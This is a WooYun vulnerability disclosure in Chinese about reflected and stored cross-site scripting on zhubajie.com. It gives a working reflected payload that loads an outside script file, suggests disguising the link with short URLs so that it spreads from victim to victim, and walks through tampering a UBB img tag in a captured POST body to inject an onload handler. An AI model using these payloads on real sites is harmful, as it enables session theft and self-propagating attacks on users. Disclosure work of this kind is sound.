WooYun.org

先说反射型
先感谢@possible 大牛给的点。
猪八戒网貌似用的第三方的输入输出防火墙. 各种符号过滤包括冒号，唯独没有过滤<>
貌似你的第三方只过滤注入。而且是用一大串的n个\\\\转义， html标签可不认这个转义
" 号就可阻断了这防火墙真的很奇葩啊。
于是有了下面的反射型.http://search.zhubajie.com/?qa=</title><script src=//192.168.2.254/all.js> </script><title>
titile 标签 闭合然后写入script标签 测试的时候发现 http://加不进去 是过滤了：号 没事ie会自己补http://
这样干净的绕过输入过滤机制
引入外部js ie6的随便打了.
猪八戒站内的各种互动,把连接用短网址伪装好.
发给人点，点了后再顺便把点的人也感染一番，然后下面的人继续点.
接着又和@possible讨论按照八戒的用的防漏洞的机制估计整站都是用的这个产品不难想象这样的转义过滤多半存在储存型，于是继续挖果然不出所料。

接着说储存型的
http://quan.zhubajie.com/thread-index-threadid-141832-page-21.html
猪圈的编辑器有个插表情的功能
这样的ubb编辑器一看基本上都有储存了
于是顺手测了下真的有
复现流程
登录猪圈http://quan.zhubajie.com/
打开抓包工具，点击俯卧撑表情提交，在抓包工具里面截获post包得到

在%5d前面加入%22 (双引号)发出去
修改包前：

threadid=141832&message=+%5Bimg%3D%E4%BF%AF%E5%8D%A7%E6%92%91%5Dhttp%3A%2F%2Fs.zbjimg.com%2Fubb%2Fxheditor_emot%2Fdefault%2F8.gif%5B%2Fimg%5D&tagid=5216

改包后：

threadid=141832&message=+%5Bimg%3D%E4%BF%AF%E5%8D%A7%E6%92%91%22%5Dhttp%3A%2F%2Fs.zbjimg.com%2Fubb%2Fxheditor_emot%2Fdefault%2F8.gif%5B%2Fimg%5D&tagid=5216

回到页面可见img标签已经被阻断了
那么就加入onload 过程不详述了看图

由此产生储存型.页面排版已经乱了onload已经加进去了
这里我没有使用alert 是不想在这个帖子弹。测的时候这个帖子可热着.